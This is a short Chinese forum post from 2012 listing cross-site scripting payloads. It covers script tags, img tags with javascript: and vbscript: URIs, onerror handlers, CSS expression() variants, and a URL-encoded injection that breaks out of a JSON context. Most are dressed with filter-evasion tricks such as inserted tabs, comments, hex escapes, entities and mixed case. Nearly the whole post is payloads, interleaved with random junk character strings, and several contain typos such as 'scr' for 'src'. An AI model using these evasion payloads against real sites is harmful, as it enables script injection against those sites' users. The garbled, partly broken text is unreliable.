<script>alert("跨站")</script> (最常用); }% K5 I! E8 ~" R# [, ~& n c+ Q
<img scr=javascript:alert("跨站")></img>4 g' E8 K! _7 Z3 y% j- C! d
<img scr="javascript: alert(/跨站/)></img>' {+ l9 ?9 @4 E/ I
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)8 w8 K: |. Y. A) z1 O
<img scr="#" onerror=alert(/跨站/)></img>6 L$ o, `! l3 g
<img scr="#" style="xss:expression(alert(/xss/));"></img>
# o5 H+ [( h+ w. v<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)4 V3 @$ ]5 ^# j O6 [$ l; a$ B
<img src=vbscript:msgbox ("xss")></img>% T3 S. c* I) V+ t
<style> input {left:expression (alert('xss'))}</style># ?% t5 r8 f0 K
<div style={left:expression (alert('xss'))}></div>
( B o5 B5 H+ o! s; b<div style={left:exp/* */ression (alert('xss'))}></div>
1 g! H6 `; T% W4 v; U6 s: {5 J<div style={left:\0065\0078ression (alert('xss'))}></div>; c/ z; P! ]3 S7 D$ `( |/ ]
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div># h/ w$ p2 n# y& Q
unicode <div style="{left:expRessioN (alert('xss'))}">7 Z( a0 f: E* _2 k$ c
0 ]2 F- E2 f% R/ o8 w
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
# S& A: | v8 e. [* c+ ~4 M$ f6 d |
发表于 2012-9-15 14:09:13
收藏
支持
反对